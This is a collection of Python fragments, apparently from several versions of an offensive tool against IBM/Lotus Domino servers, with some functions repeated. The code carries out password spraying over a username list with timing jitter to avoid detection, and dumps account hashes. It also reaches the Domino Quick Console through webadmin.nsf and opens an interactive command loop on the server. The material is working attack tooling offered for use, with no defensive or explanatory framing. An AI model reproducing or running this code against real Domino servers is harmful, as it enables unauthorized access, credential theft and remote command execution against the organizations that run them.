def check_access(target, header, username, password): session = requests.Session() session.auth = (username, password) try: webadmin_url = "{0}/webadmin.nsf".format(target) check_webadmin = session.get(webadmin_url, headers=header, verify=False) if check_webadmin.status_code == 200: if 'form method="post"' in check_webadmin.text: utility.print_warn('Unable to access webadmin.nsf, maybe you are not admin?') else: path_url = "{0}/webadmin.nsf/fmpgHomepage?ReadForm".format(target) check_path = session.get(path_url, headers=header, verify=False) path_regex = re.search('>(?i)([a-z]:\\\\[a-z0-9()].+\\\\[a-z].+)\\\\domino\\\\data', check_path.text) if path_regex: path = path_regex.group(1) else: path = None utility.print_status('Could not identify Domino file path, trying defaults...') who_am_i, local_path = test_command(target, header, path, username, password) if who_am_i and local_path: utility.print_good("Running as {0}".format(who_am_i)) Interactive(target, header, local_path, username, password).cmdloop() else: utility.print_warn('Unable to access webadmin.nsf!') elif check_webadmin.status_code == 401: utility.print_warn('Unable to access webadmin.nsf, maybe you are not admin?!') else: utility.print_warn('Unable to find webadmin.nsf!') except Exception as error: utility.print_error("Error: {0}".format(error))
def reverse_bruteforce(target, usernames, password, auth): username_list = [] valid_usernames = [] names_url = "{0}/names.nsf".format(target) # Import usernames from file username_file = open(usernames, 'r') for username in username_file: username_list.append(username.rstrip()) username_file.close() # Start reverse brute force for username in username_list: jitter = random.random() time.sleep(jitter) try: if auth == 'basic': access = utility.basic_auth(names_url, username, password) elif auth == 'form': access, session = utility.form_auth(names_url, username, password) elif auth == 'open': utility.print_good( "{0} does not require authentication".format(names_url)) break else: utility.print_warn("Could not find {0}".format(names_url)) break if access: utility.print_good("Valid account: {0} {1}".format( username, password)) valid_usernames.append(username) else: pass except KeyboardInterrupt: break except Exception as error: utility.print_error("Error: {0}".format(error)) continue # Print found usernames if len(valid_usernames) > 0: if len(valid_usernames) == 1: plural = '' else: plural = 's' utility.print_status("Found {0} valid account{1}".format( len(valid_usernames), plural)) for valid_username in valid_usernames: print("{0} {1}".format(valid_username, password)) else: utility.print_warn('No valid accounts found')
def reverse_bruteforce(target, usernames, password, auth): username_list = [] valid_usernames = [] names_url = "{0}/names.nsf".format(target) # Import usernames from file username_file = open(usernames, 'r') for username in username_file: username_list.append(username.rstrip()) username_file.close() # Start reverse brute force for username in username_list: jitter = random.random() time.sleep(jitter) try: if auth == 'basic': access = utility.basic_auth(names_url, username, password) elif auth == 'form': access, session = utility.form_auth(names_url, username, password) elif auth == 'open': utility.print_good("{0} does not require authentication".format(names_url)) break else: utility.print_warn("Could not find {0}".format(names_url)) break if access: utility.print_good("Valid account: {0} {1}".format(username, password)) valid_usernames.append(username) else: pass except KeyboardInterrupt: break except Exception as error: utility.print_error("Error: {0}".format(error)) continue # Print found usernames if len(valid_usernames) > 0: if len(valid_usernames) == 1: plural = '' else: plural = 's' utility.print_status("Found {0} valid account{1}".format(len(valid_usernames), plural)) for valid_username in valid_usernames: print("{0} {1}".format(valid_username, password)) else: utility.print_warn('No valid accounts found')
def check_access(target, username, password, auth): webadmin_url = "{0}/webadmin.nsf".format(target) try: # Check access if auth == 'basic': access = utility.basic_auth(webadmin_url, username, password) session = None elif auth == 'form': access, session = utility.form_auth(webadmin_url, username, password) else: session = None # Get local file path path_url = "{0}/webadmin.nsf/fmpgHomepage?ReadForm".format(target) if access or auth == 'open': if auth == 'basic': check_path = requests.get(path_url, headers=utility.get_headers(), auth=(username, password), verify=False) elif auth == 'form': check_path = session.get(path_url, headers=utility.get_headers(), verify=False) else: check_path = requests.get(path_url, headers=utility.get_headers(), verify=False) path_regex = re.compile("DataDirectory\s*=\s*'(.+)';", re.I) if path_regex.search(check_path.text): local_path = path_regex.search(check_path.text).group(1) else: local_path = None utility.print_warn('Could not identify Domino file path!') # Get operating system if 'UNIX' in check_path.text: os = 'linux' elif 'Windows' in check_path.text: os = 'windows' else: os = 'windows' utility.print_status('Could not identify Domino operating system!') # Test writing to local file system whoami, path, hostname = test_command(target, os, local_path, username, password, session) if whoami and path: Interactive(target, os, path, username, password, whoami, hostname, session).cmdloop() else: utility.print_warn('Unable to access webadmin.nsf!') else: utility.print_warn("Unable to access {0}, you might not be an admin!".format(webadmin_url)) except Exception as error: utility.print_error("Error: {0}".format(error))
brute_parser.add_argument('url', help='Domino server URL') brute_parser.add_argument('userlist', help='List of usernames') brute_parser.add_argument('--password', help='Password', default='', nargs='+', required=False) args = parser.parse_args() # Process Domino URL target = utility.check_url(args.url) if target: # Detect type of authentication auth_type = utility.detect_auth(target) if auth_type: # Fingerprint if args.action == 'fingerprint': utility.print_status('Fingerprinting Domino server') fingerprint.fingerprint(target, args.username, ' '.join(args.password), auth_type) # Dump hashes elif args.action == 'hashdump': utility.print_status('Dumping account hashes') hashdump.enum_accounts(target, args.username, ' '.join(args.password), auth_type) # Interact with Quick Console elif args.action == 'console': utility.print_status('Accessing Domino Quick Console') quickconsole.check_access(target, args.username, ' '.join(args.password), auth_type) # Reverse brute force else: if os.path.isfile(args.userlist):
parser.add_argument('-p', '--password', help='Password', default='', nargs='+', required=False) parser.add_argument('--hashdump', help='Dump Domino hashes', action='store_true', required=False) parser.add_argument('--quickconsole', help='Interact with Domino Quick Console', action='store_true', required=False) args = parser.parse_args() HEADER = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive' } # Process Domino URL target = utility.process_url(args.url) # Interact with quick console if args.quickconsole: utility.print_status('Accessing Domino Quick Console...') quickconsole.check_access(target, HEADER, args.username, ' '.join(args.password)) # Dump hashes elif args.hashdump: utility.print_status('Enumerating accounts...') hashdump.enum_accounts(target, HEADER, args.username, ' '.join(args.password)) # Fingerprint else: utility.print_status('Fingerprinting Domino server...') fingerprint.fingerprint(target, HEADER) fingerprint.check_portals(target, HEADER)
parser.add_argument('--quickconsole', help='Interact with Domino Quick Console', action='store_true', required=False) parser.add_argument('--bruteforce', help='Reverse brute force Domino server', action='store_true', required=False) args = parser.parse_args() # Process Domino URL target = utility.check_url(args.url) if target == None: utility.print_warn('Please provide a valid URL!') else: # Detect type of authentication the Domino server is using auth_type = utility.detect_auth(target) # Interact with quick console if args.quickconsole: utility.print_status('Accessing Domino Quick Console...') quickconsole.check_access(target, args.username, ' '.join(args.password), auth_type) # Dump hashes elif args.hashdump: utility.print_status('Dumping account hashes...') hashdump.enum_accounts(target, args.username, ' '.join(args.password), auth_type) # Reverse brute force elif args.bruteforce: if os.path.isfile(args.username): utility.print_status("Starting reverse brute force with {0} as the password...".format(' '.join(args.password))) bruteforce.reverse_bruteforce(target, args.username, ' '.join(args.password), auth_type) else: utility.print_warn('You must supply the full path to a file containing a list of usernames!')